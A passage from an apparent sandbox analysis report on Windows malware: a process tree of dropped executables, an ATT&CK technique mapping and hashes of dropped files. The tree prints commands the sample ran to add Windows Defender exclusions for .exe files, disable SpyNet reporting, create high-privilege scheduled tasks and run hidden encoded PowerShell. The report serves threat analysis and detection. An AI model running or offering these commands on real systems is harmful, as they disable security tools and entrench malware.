- Suspicious use of SetWindowsHookEx
PID:4348

C:\Users\Admin\AppData\Local\Temp\7zSA1F1.tmp\Install.exe
.\Install.exe
6⤵
PID:4660

C:\Users\Admin\AppData\Local\Temp\7zSD4A9.tmp\Install.exe
.\Install.exe /S /site_id "525403"
7⤵
PID:3192

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
8⤵
PID:5812

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
9⤵
PID:6000

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
10⤵
PID:6108

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
8⤵
PID:5988

C:\Users\Admin\Pictures\Adobe Films\chqhRMiSjEE0Y0ddM5wdKtnQ.exe
"C:\Users\Admin\Pictures\Adobe Films\chqhRMiSjEE0Y0ddM5wdKtnQ.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2156

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" .\a6U_WGm.9B
6⤵
PID:3860

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\a6U_WGm.9B
7⤵
PID:5332

C:\Users\Admin\Pictures\Adobe Films\KaAa7aogiVFFjGBRnq8SpRfN.exe
"C:\Users\Admin\Pictures\Adobe Films\KaAa7aogiVFFjGBRnq8SpRfN.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4656

C:\Users\Admin\Pictures\Adobe Films\3Dpo_6YgUtBJJRmXSwPZVPRP.exe
"C:\Users\Admin\Pictures\Adobe Films\3Dpo_6YgUtBJJRmXSwPZVPRP.exe"
5⤵
PID:1844

C:\Users\Admin\Pictures\Adobe Films\ZCu24pbsjs7XbwH2fkfqWpuc.exe
"C:\Users\Admin\Pictures\Adobe Films\ZCu24pbsjs7XbwH2fkfqWpuc.exe"
5⤵
- Executes dropped EXE
PID:1804

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1804 -s 856
6⤵
PID:6048

C:\Users\Admin\Pictures\Adobe Films\BtcBk3O86PhlVo4EcJTx6LR6.exe
"C:\Users\Admin\Pictures\Adobe Films\BtcBk3O86PhlVo4EcJTx6LR6.exe"
5⤵
PID:5164

C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr1649.exe
"C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr1649.exe"
6⤵
PID:6060

C:\Users\Admin\AppData\Local\Temp\ywang.exe
"C:\Users\Admin\AppData\Local\Temp\ywang.exe"
6⤵
PID:6116

C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe
"C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe"
6⤵
PID:3196

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:1256

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:4304

C:\Users\Admin\Pictures\Adobe Films\YdgTql2LfPAXadkVN7iqQoz9.exe
"C:\Users\Admin\Pictures\Adobe Films\YdgTql2LfPAXadkVN7iqQoz9.exe"
3⤵
- Executes dropped EXE
PID:3852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4236 -ip 4236
1⤵
PID:4064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4236 -ip 4236
1⤵
PID:3776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4236 -ip 4236
1⤵
PID:3140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4236 -ip 4236
1⤵
PID:1792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4236 -ip 4236
1⤵
PID:4324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4236 -ip 4236
1⤵
PID:744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4236 -ip 4236
1⤵
PID:3704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4236 -ip 4236
1⤵
PID:3132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4236 -ip 4236
1⤵
PID:5008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4236 -ip 4236
1⤵
PID:2188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4236 -ip 4236
1⤵
PID:4584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4236 -ip 4236
1⤵
PID:3196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4236 -ip 4236
1⤵
PID:4696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4236 -ip 4236
1⤵
PID:2088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4236 -ip 4236
1⤵
PID:4448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4236 -ip 4236
1⤵
PID:2148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4236 -ip 4236
1⤵
PID:4632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4236 -ip 4236
1⤵
PID:4300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4236 -ip 4236
1⤵
PID:4400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4236 -ip 4236
1⤵
PID:1140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4236 -ip 4236
1⤵
PID:5080

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:4240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 3948 -ip 3948
1⤵
PID:4216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3948 -ip 3948
1⤵
PID:1676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 3948 -ip 3948
1⤵
PID:4380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3948 -ip 3948
1⤵
PID:3988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3948 -ip 3948
1⤵
PID:1632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3948 -ip 3948
1⤵
PID:2060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3948 -ip 3948
1⤵
PID:4272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3948 -ip 3948
1⤵
PID:1880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3948 -ip 3948
1⤵
PID:2712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3948 -ip 3948
1⤵
PID:3612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3948 -ip 3948
1⤵
PID:3828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3948 -ip 3948
1⤵
PID:2960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 3948 -ip 3948
1⤵
PID:3608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3948 -ip 3948
1⤵
PID:2384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3948 -ip 3948
1⤵
PID:2316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3948 -ip 3948
1⤵
PID:4076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2432 -ip 2432
1⤵
PID:3924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2432 -ip 2432
1⤵
PID:5048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2432 -ip 2432
1⤵
PID:4256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2432 -ip 2432
1⤵
PID:4868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2432 -ip 2432
1⤵
PID:4588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2432 -ip 2432
1⤵
PID:2020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2432 -ip 2432
1⤵
PID:4972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2432 -ip 2432
1⤵
PID:1232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2432 -ip 2432
1⤵
PID:3080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2432 -ip 2432
1⤵
PID:2384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2432 -ip 2432
1⤵
PID:4236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2432 -ip 2432
1⤵
PID:2244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2432 -ip 2432
1⤵
PID:4564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2432 -ip 2432
1⤵
PID:3132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2432 -ip 2432
1⤵
PID:2752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2432 -ip 2432
1⤵
PID:3784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2432 -ip 2432
1⤵
PID:4256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2432 -ip 2432
1⤵
PID:4764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2432 -ip 2432
1⤵
PID:4600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2432 -ip 2432
1⤵
PID:2896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2432 -ip 2432
1⤵
PID:3600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2432 -ip 2432
1⤵
PID:4772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2432 -ip 2432
1⤵
PID:4496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2432 -ip 2432
1⤵
PID:1476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2432 -ip 2432
1⤵
PID:2292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4924 -ip 4924
1⤵
PID:3000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4696 -ip 4696
1⤵
PID:940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1664 -ip 1664
1⤵
PID:3708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2712 -ip 2712
1⤵
PID:5072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3780 -ip 3780
1⤵
PID:4480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 708 -ip 708
1⤵
PID:5024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 708 -ip 708
1⤵
PID:1332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4924 -ip 4924
1⤵
PID:1356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4696 -ip 4696
1⤵
PID:1544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 708 -ip 708
1⤵
PID:3700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 2352 -ip 2352
1⤵
PID:5140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4924 -ip 4924
1⤵
PID:5708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 708 -ip 708
1⤵
PID:5716

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 644 -p 1804 -ip 1804
1⤵
PID:5904

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:6096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 4924 -ip 4924
1⤵
PID:6140

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
MD5
54e9306f95f32e50ccd58af19753d929

SHA1
eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

SHA256
45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

SHA512
8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
MD5
ffa22bb8741a7e8890155b548d98b3f6

SHA1
c9aefaa4dd9d528ee483fc21fbf4e19bc6a2dcae

SHA256
cee09917eed78bf9b3e753a1694e5d17bfb98109d792cb5b3f01a7fa7c535ec5

SHA512
e0bfc8bc9dbd3499641d5404d9db3a4bc10394801596bc68eb937be69930efa93b8363fecef85a17f0c1573f127d920d42fc936ba0e7ee2c8ff19b90214cc49c

Download Submit
C:\Users\Admin\AppData\Local\Temp\File.exe
MD5
c9f445ba47d43aba67caf6020c2390d3

SHA1
03180d69fa4b26edbe627e2691df38882eab03b0

SHA256
acc70eb94782931ab5f817a91b3c4cedf4c3077fb497a63e90a55e500da7676e

SHA512
8c1e34f04f84fa00b58499c8ee986ebef15ba015021831ee4582f8d0c2347192c9b1d6f15211bc7c9490e268066801f35565b8d85ab07796a06937b5cf4ac141

Download Submit
C:\Users\Admin\AppData\Local\Temp\File.exe
MD5
c9f445ba47d43aba67caf6020c2390d3

SHA1
03180d69fa4b26edbe627e2691df38882eab03b0

SHA256
acc70eb94782931ab5f817a91b3c4cedf4c3077fb497a63e90a55e500da7676e

SHA512
8c1e34f04f84fa00b58499c8ee986ebef15ba015021831ee4582f8d0c2347192c9b1d6f15211bc7c9490e268066801f35565b8d85ab07796a06937b5cf4ac141

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe
MD5
2d0217e0c70440d8c82883eadea517b9

SHA1
f3b7dd6dbb43b895ba26f67370af99952b7d83cb

SHA256
d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01

SHA512
6d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe
MD5
2d0217e0c70440d8c82883eadea517b9

SHA1
f3b7dd6dbb43b895ba26f67370af99952b7d83cb

SHA256
d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01

SHA512
6d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
MD5
56d677067ab2c679322f39399564f89f

SHA1
b5c6dcb1774c6d4bd88fa9629a1cd589a6fa7b88

SHA256
d3e99387280c4d495ea9115c5c6e7b92289763d8b79578caf6ab06f4fe16fdf8

SHA512
b48ba8c27706dcb1e22197c85395a36ab74d354b428d8dcbccf7fb934167588ecfa4aaa0c6ee2c658609bf78fcb8c477f8dfcd7129370065cb920930ba9191c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
MD5
56d677067ab2c679322f39399564f89f

SHA1
b5c6dcb1774c6d4bd88fa9629a1cd589a6fa7b88

SHA256
d3e99387280c4d495ea9115c5c6e7b92289763d8b79578caf6ab06f4fe16fdf8

SHA512
b48ba8c27706dcb1e22197c85395a36ab74d354b428d8dcbccf7fb934167588ecfa4aaa0c6ee2c658609bf78fcb8c477f8dfcd7129370065cb920930ba9191c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Graphics.exe
MD5
907b8a8bacc5432518151b830339539d

SHA1
9d5a934d1291db04f88482e2c3e5f3053552e044

SHA256
61727c9ed9fc3b1f5c4a093ec2c117267b98123939766648c4eda1ea2a83aa3f

SHA512
8129c626287277957d07714000f854c20271b4c7a1990431aa41a86b9152000e50b8ffd3cddf8ceb6c78f7ab2b17135fbee115d259964970f854ea6416f0f622

Download Submit
C:\Users\Admin\AppData\Local\Temp\Graphics.exe
MD5
907b8a8bacc5432518151b830339539d

SHA1
9d5a934d1291db04f88482e2c3e5f3053552e044

SHA256
61727c9ed9fc3b1f5c4a093ec2c117267b98123939766648c4eda1ea2a83aa3f

SHA512
8129c626287277957d07714000f854c20271b4c7a1990431aa41a86b9152000e50b8ffd3cddf8ceb6c78f7ab2b17135fbee115d259964970f854ea6416f0f622

Download Submit
C:\Users\Admin\AppData\Local\Temp\Graphics.exe
MD5
907b8a8bacc5432518151b830339539d

SHA1
9d5a934d1291db04f88482e2c3e5f3053552e044

SHA256
61727c9ed9fc3b1f5c4a093ec2c117267b98123939766648c4eda1ea2a83aa3f

SHA512
8129c626287277957d07714000f854c20271b4c7a1990431aa41a86b9152000e50b8ffd3cddf8ceb6c78f7ab2b17135fbee115d259964970f854ea6416f0f622

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install.exe
MD5
0f00fcb9597bd612c21eecc288a179bc

SHA1
409ab50115440a5c725c1e753f1e0eb5d6a50a04

SHA256
b5cb460a9d30794df04a6e93dbe452e463cbe0392f37bb888dab42b4d254ba09

SHA512
227d3170a1376c4366840308a30422ebc6d3169c3bfa0844e122854cacb868abedc0aeb45e982262132146a6c3546d1b5363577f9c945492befa489bdcc7e145

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install.exe
MD5
0f00fcb9597bd612c21eecc288a179bc

SHA1
409ab50115440a5c725c1e753f1e0eb5d6a50a04

SHA256
b5cb460a9d30794df04a6e93dbe452e463cbe0392f37bb888dab42b4d254ba09

SHA512
227d3170a1376c4366840308a30422ebc6d3169c3bfa0844e122854cacb868abedc0aeb45e982262132146a6c3546d1b5363577f9c945492befa489bdcc7e145

Download Submit
C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
MD5
2280a59b2b1d66317cf0e2c45399dbee

SHA1
5c1636b218ae62bd4c2e4d4507dd454879073c69

SHA256
c1eb1fe7b2cf1dddc60a25be7459175763db634c792713392b45fadf36e4a61c

SHA512
950a049dfb1325ae3551ec0b17a68310d6b10905500b2e0616146c9bad2d2e0ff071ea9103a8896b562817d42c56e3be261e02435b764b29020d54c733ab7ea9

Download Submit
C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
MD5
2280a59b2b1d66317cf0e2c45399dbee

SHA1
5c1636b218ae62bd4c2e4d4507dd454879073c69

SHA256
c1eb1fe7b2cf1dddc60a25be7459175763db634c792713392b45fadf36e4a61c

SHA512
950a049dfb1325ae3551ec0b17a68310d6b10905500b2e0616146c9bad2d2e0ff071ea9103a8896b562817d42c56e3be261e02435b764b29020d54c733ab7ea9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
MD5
59ccc05606b7f0accc052915d9b341a7

SHA1
4e739efa0c7ec5f731694444663850e0c9e76e5f

SHA256
9554d8d211a17d370e60d997a641c11ca97213fe2c6a6173c597c85a8e7aa0ee

SHA512
66b31654bd81520b838cdd6f8e5635b33f76ab1cac248455da69f859737bc1b1297188bdd2c10063a7e98d25ec0e0d0fc3ad424d34c5f0197b9cb123849fdf13

Download Submit
C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
MD5
59ccc05606b7f0accc052915d9b341a7

SHA1
4e739efa0c7ec5f731694444663850e0c9e76e5f

SHA256
9554d8d211a17d370e60d997a641c11ca97213fe2c6a6173c597c85a8e7aa0ee

SHA512
66b31654bd81520b838cdd6f8e5635b33f76ab1cac248455da69f859737bc1b1297188bdd2c10063a7e98d25ec0e0d0fc3ad424d34c5f0197b9cb123849fdf13

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
MD5
d98e33b66343e7c96158444127a117f6

SHA1
bb716c5509a2bf345c6c1152f6e3e1452d39d50d

SHA256
5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

SHA512
705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
MD5
d98e33b66343e7c96158444127a117f6

SHA1
bb716c5509a2bf345c6c1152f6e3e1452d39d50d

SHA256
5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

SHA512
705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

Download Submit
C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
MD5
50150c14758404e4b24a96b2d79979d4

SHA1
add429c0fffc67e79db295966bbc85dc37b081c9

SHA256
2305d0ad5968826502a4b1fc74720571301279e538e536b50db6a7d06bdb6418

SHA512
632ceed23944486345763e0a8adcd18ff99808a947c5ec1bcd55e484286828b18a9da8a9bc45e328da6d66aa617eb5e74085e5056be132446106eb57b82eb62d

Download Submit
C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
MD5
b7161c0845a64ff6d7345b67ff97f3b0

SHA1
d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

SHA256
fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

SHA512
98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

Download Submit
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
7fee8223d6e4f82d6cd115a28f0b6d58

SHA1
1b89c25f25253df23426bd9ff6c9208f1202f58b

SHA256
a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

SHA512
3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

Download Submit
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
7fee8223d6e4f82d6cd115a28f0b6d58

SHA1
1b89c25f25253df23426bd9ff6c9208f1202f58b

SHA256
a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

SHA512
3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

Download Submit
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
a6279ec92ff948760ce53bba817d6a77

SHA1
5345505e12f9e4c6d569a226d50e71b5a572dce2

SHA256
8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181

SHA512
213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
a6279ec92ff948760ce53bba817d6a77

SHA1
5345505e12f9e4c6d569a226d50e71b5a572dce2

SHA256
8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181

SHA512
213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
MD5
1227d588bac59760dbb4804b05a46f87

SHA1
e8f932e1a726341c170a7098ed35312d38fc580d

SHA256
ed60973bbb992b5a93705e45e580043a82a7c58a79029846a04cdca468f48f1f

SHA512
ff24ca3b207041b705412be80970093ad3f6f50af2831001be1eeb0ca9006837e91968a4c726df8a286b640c522dd9337715e3b51dbf0e6979f6fefab7ca2acb

Download Submit
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
MD5
1227d588bac59760dbb4804b05a46f87

SHA1
e8f932e1a726341c170a7098ed35312d38fc580d

SHA256
ed60973bbb992b5a93705e45e580043a82a7c58a79029846a04cdca468f48f1f

SHA512
